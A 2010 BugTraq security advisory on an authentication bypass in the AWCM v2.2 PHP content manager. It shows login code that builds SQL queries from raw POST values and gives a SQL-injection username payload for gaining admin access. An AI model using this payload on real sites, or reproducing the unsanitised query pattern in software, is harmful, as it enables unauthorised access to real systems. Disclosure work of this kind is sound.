BugTraq
AWCM v2.2 Auth Bypass Vulnerabilities Nov 16 2010 09:21PM
eidelweiss windowslive com (1 replies)
########################################################

AWCM v2.2 Auth Bypass Vulnerabilities

########################################################

____ __ __ __

/\ _`\ /\ \ __ /\ \__/\ \

\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __

\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__` \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/

\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____ \/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/

/\____/

\_/__/

__ __ __ ______ By:eidelweiss

/\ \ __/\ \ /\ \ /\ _ \

\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____

\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__ \ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, ` \ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/

'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/

\ \_\ \ \_\

\/_/ \/_/

[+]Script: AWCM

[+]Version: 2.2 final

[+]Download: http://sourceforge.net/projects/awcm/files/AWCM%20v2.2/AWCM%20v2.2%20fin
al.zip/download

########################################################

[!]Author : eidelweiss

[!]Contact: eidelweiss[at]windowslive[dot]com

[!]Blog: http://eidelweiss-advisories.blogspot.com

[!]Gratz : DealCyber member`s , yogyacarderlink crew , and YOU !!!

Original Advisories:

http://eidelweiss-advisories.blogspot.com/2010/11/awcm-v22-auth-bypass-v
ulnerabilities.html

########################################################

-=[Description]=-

ar web content manager is a free web contemts management system (cms) built with php , mysql , css , javascript , css to allow you to manage your website easily and fast.

it contains many main categories such as (videos, topics, sounds, photo gallery.

########################################################

-=[VUln Code]=-

first lets we see the code on login.php file

**********************************

<?php

include ("header.php");

$pusername = $_POST['username'];

$ppassword = md5($_POST['password']);

$premember = $_POST['remember'];

$mysql_login547_query = mysql_query("SELECT username,password,id FROM

awcm_members WHERE username = '$pusername' AND password = '$ppassword'");

$mysql_login547_total = mysql_num_rows($mysql_login547_query);

$mysql_login547_row = mysql_fetch_array($mysql_login547_query);

---------

**********************************

ok, now we see the code in control/login.php file

and on this file i see the vulnerability code that can be used by attacker or anonymous to bypass the login section..

its also possible to gain the administrator access ( if you lucky ofcourse :D )

here the code on control/login.php file:

**********************************

<?php

$page = 'login';

include ("common.php");

if(isset($_GET['do'])) {

$user = $_POST['username']; // <= i dont give fuck

$pass = md5($_POST['password']); //

$cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'");

$cp_login_total = mysql_num_rows($cp_login_query);

**********************************

########################################################

-=[ How To Exploit / P0C ]=-

put as username : 'or 1=1/*

=========================| -=[ E0F ]=- |============================

[ reply ]
Re: AWCM v2.2 Auth Bypass Vulnerabilities Apr 05 2011 10:58PM
security curmudgeon (jericho attrition org)


 

Privacy Statement
Copyright 2010, SecurityFocus